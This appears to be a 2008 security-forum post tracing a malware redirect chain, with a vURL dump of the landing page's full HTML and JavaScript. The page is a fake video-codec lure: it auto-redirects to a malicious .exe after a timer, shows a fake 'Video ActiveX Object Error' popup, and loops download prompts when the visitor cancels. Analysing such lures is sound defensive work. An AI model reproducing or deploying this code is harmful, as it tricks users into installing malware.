Good one for you

...... fun starts at;
h
ttp://groups.google.co.uk/group/skdu-Azmut-142/web/mysteryfcm-co-uk?hl=en
Leads to;
h
ttp://tutty.cn/page.html
Which leads to;
h
ttp://ihavewetfuckpussy.com/exclusive/
and
h
ttp://wetsoftwares.com/exe2/3913227.exe
h
ttp://wetsoftwares.com/exe2/.exe
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://tutty.cn/page.html
Server IP: 84.16.242.70 [ 84-16-242-70.internetserviceteam.com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 21 May 2008
Time: 21:35:38:35
*****************************************************************
<script language="javascript">
<!--
function show(title,url) {
wmpwidth=document.body.clientWidth/2-270;
wmpheight=document.body.clientHeight/2-215;
wmp = window.open("", "movie", "width=570,height=430,top="+wmpheight+",left="+wmpwidth+",status=no,toolbar=no,menubar=no");
wmp.document.open();
wmp.document.write('<html><head><title>'+title+'</title></head><frameset rows="100%,*" border=0 frameborder=no framespacing=0>');
wmp.document.write('<frame name="main" src="'+url+'"><frame name="blank" src="about:blank"></frameset><noframes><body></body></noframes></html>');
}
-->
</script>
<script src="/p/p.js.php?id=3913227" language="javascript" type="text/javascript"></script>
<html>
<head>
<base href="http://ihavewetfuckpussy.com/exclusive/">
<title>Watch Free Movie</title>
<meta name="robots" content="noindex,nofollow,noarchive">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style>
.t {border:1px solid #666666;}
.b1 {
font-family:Arial;
font-size:12px;font-weight:bold;
color: #fff;
background-color:#fff;
background-image:url(./1/img5.gif);
background-repeat: no-repeat;
width:104px;
height:23px;
border:0;
margin:0; padding: 0;
}
.b11 {
font-family:Arial;
font-size:12px;font-weight:bold;
color: #fff;
text-decoration:underline;
background-color:#fff;
background-image:url(./1/img5.gif);
background-repeat: no-repeat;
width:104px;
height:23px;
border:0;
margin:0; padding: 0;
}
</style>
<script>
function zfqEtKojkLqZ()
{
if(window.navigator.userAgent.indexOf("SV1") != -1 || window.navigator.userAgent.indexOf("MSIE 7") !=-1)
{
return;
}
else
{
window.setTimeout("location.href='http://wetsoftwares.com/exe2/3913227.exe'", 3000);
}
}
-->
</script>
</head>
<body style="background-color:black;">
<table width=100% height=100%><tr><td align=center>
<script>
<!--
zfqEtKojkLqZ();
-->
</script>
<script>
<!--
var Drag = {
obj : null,
init : function(o, oRoot, minX, maxX, minY, maxY, bSwapHorzRef, bSwapVertRef, fXMapper, fYMapper)
{
o.onmousedown = Drag.start;
o.hmode = bSwapHorzRef ? false : true ;
o.vmode = bSwapVertRef ? false : true ;
o.root = oRoot && oRoot != null ? oRoot : o ;
if (o.hmode && isNaN(parseInt(o.root.style.left ))) o.root.style.left = "0px";
if (o.vmode && isNaN(parseInt(o.root.style.top ))) o.root.style.top = "0px";
if (!o.hmode && isNaN(parseInt(o.root.style.right ))) o.root.style.right = "0px";
if (!o.vmode && isNaN(parseInt(o.root.style.bottom))) o.root.style.bottom = "0px";
o.minX = typeof minX != 'undefined' ? minX : null;
o.minY = typeof minY != 'undefined' ? minY : null;
o.maxX = typeof maxX != 'undefined' ? maxX : null;
o.maxY = typeof maxY != 'undefined' ? maxY : null;
o.xMapper = fXMapper ? fXMapper : null;
o.yMapper = fYMapper ? fYMapper : null;
o.root.onDragStart = new Function();
o.root.onDragEnd = new Function();
o.root.onDrag = new Function();
},
start : function(e)
{
var o = Drag.obj = this;
e = Drag.fixE(e);
var y = parseInt(o.vmode ? o.root.style.top : o.root.style.bottom);
var x = parseInt(o.hmode ? o.root.style.left : o.root.style.right );
o.root.onDragStart(x, y);
o.lastMouseX = e.clientX;
o.lastMouseY = e.clientY;
if (o.hmode) {
if (o.minX != null) o.minMouseX = e.clientX - x + o.minX;
if (o.maxX != null) o.maxMouseX = o.minMouseX + o.maxX - o.minX;
} else {
if (o.minX != null) o.maxMouseX = -o.minX + e.clientX + x;
if (o.maxX != null) o.minMouseX = -o.maxX + e.clientX + x;
}
if (o.vmode) {
if (o.minY != null) o.minMouseY = e.clientY - y + o.minY;
if (o.maxY != null) o.maxMouseY = o.minMouseY + o.maxY - o.minY;
} else {
if (o.minY != null) o.maxMouseY = -o.minY + e.clientY + y;
if (o.maxY != null) o.minMouseY = -o.maxY + e.clientY + y;
}
document.onmousemove = Drag.drag;
document.onmouseup = Drag.end;
return false;
},
drag : function(e)
{
e = Drag.fixE(e);
var o = Drag.obj;
var ey = e.clientY;
var ex = e.clientX;
var y = parseInt(o.vmode ? o.root.style.top : o.root.style.bottom);
var x = parseInt(o.hmode ? o.root.style.left : o.root.style.right );
var nx, ny;
if (o.minX != null) ex = o.hmode ? Math.max(ex, o.minMouseX) : Math.min(ex, o.maxMouseX);
if (o.maxX != null) ex = o.hmode ? Math.min(ex, o.maxMouseX) : Math.max(ex, o.minMouseX);
if (o.minY != null) ey = o.vmode ? Math.max(ey, o.minMouseY) : Math.min(ey, o.maxMouseY);
if (o.maxY != null) ey = o.vmode ? Math.min(ey, o.maxMouseY) : Math.max(ey, o.minMouseY);
nx = x + ((ex - o.lastMouseX) * (o.hmode ? 1 : -1));
ny = y + ((ey - o.lastMouseY) * (o.vmode ? 1 : -1));
if (o.xMapper) nx = o.xMapper(y)
else if (o.yMapper) ny = o.yMapper(x)
Drag.obj.root.style[o.hmode ? "left" : "right"] = nx + "px";
Drag.obj.root.style[o.vmode ? "top" : "bottom"] = ny + "px";
Drag.obj.lastMouseX = ex;
Drag.obj.lastMouseY = ey;
Drag.obj.root.onDrag(nx, ny);
return false;
},
end : function()
{
document.onmousemove = null;
document.onmouseup = null;
Drag.obj.root.onDragEnd( parseInt(Drag.obj.root.style[Drag.obj.hmode ? "left" : "right"]),
parseInt(Drag.obj.root.style[Drag.obj.vmode ? "top" : "bottom"]));
Drag.obj = null;
},
fixE : function(e)
{
if (typeof e == 'undefined') e = window.event;
if (typeof e.layerX == 'undefined') e.layerX = e.offsetX;
if (typeof e.layerY == 'undefined') e.layerY = e.offsetY;
return e;
}
};
function Down(download,e)
{
if (e!=null && e.keyCode==27)
{ Close();
return;
}
switch (download)
{
case "iax": document.location.href='http://wetsoftwares.com/exe2/3913227.exe'; break;
Close();
}
}
function BACFltBm() {
if (confirm('Click \'OK\' to download and install media codec.')) {
location.href='http://wetsoftwares.com/exe2/3913227.exe';
}
else {
if (alert('Please download new version of media codec software.')) {
BACFltBm();
}
else {
BACFltBm();
}
}
}
function Close()
{
var p=document.getElementById("popdiv");
p.style.visibility="hidden";
BACFltBm();
}
function Details()
{
alert('Download video codec to view media files.');
}
-->
</script>
<div name="popdiv" id="popdiv" onKeyPress="Down('iax',event);" style="visibility:hidden; z-index:1;position:absolute;top:0px;left:0px;">
<table width="389" border="0" cellpadding="0" cellspacing="0">
<tr>
<td height="36" bgcolor="">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="362"><img src="./1/img1.gif"></td>
<td width="21"><img src="./1/img2.gif" onClick="Close();"></td>
<td width="6"><img src="./1/img3.gif"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td height="209" bgcolor="#FFFFDE" background="./1/img4.gif" valign="top">
<table width="100%" height="130" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="120"> </td>
<td valign="top">
<br>
<font face="Tahoma" color="#000000" style="font-size:11px;">
<b>Video ActiveX Object Error:</b><br>Your browser cannot display this video file.<br><br>You need to download new version of Video ActiveX Object to play this video file. </font>
</td>
</tr>
</table>
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td align="center">
<font face="Tahoma" color="#000000" style="font-size:11px;">
<span style='cursor:pointer;' onclick="document.location.href='http://wetsoftwares.com/exe2/3913227.exe';">To download new version of video decoder click «<u>Continue</u>».</span><br><br>
<input type="submit" value="Continue" onClick="Down('iax');" class="b11" >
<input type="submit" value="Cancel" onClick="Close();" class="b1">
<input type="submit" value="Details..." onClick="Details();" class="b1">
</font>
</td>
</tr>
</table>
</td>
</tr>
</table>
</div>
<div id="movie" style="margin:0 auto;">
<center>
<a href="http://wetsoftwares.com/exe2/3913227.exe"><img width="450" height="369" onMouseOver="window.status = 'You must download Video ActiveX Object to play this video file.';" border="0" alt="You must download Video ActiveX Object to play this video file." src="./1/movie.gif"/></a>
</center>
</div>
<script>
<!--
setTimeout("showPopDiv();",1300);
function showPopDiv()
{
var sFlag = "No";
var byFlag = false;
var FlagAr = sFlag.split("");
if(FlagAr[0]=="1"){byFlag = true;}
if(FlagAr[0]=="3"){byFlag = true;}
if(!byFlag)
{
var p=document.getElementById("popdiv");
wmpwidth=document.body.clientWidth/2-190;
wmpheight=document.body.clientHeight/2-130;
p.style.top = wmpheight;
p.style.left = wmpwidth;
p.style.visibility = "visible";
p.focus();
}
}
Drag.init(document.getElementById("popdiv"));
-->
</script>
</div>
</table>
</body>
</html>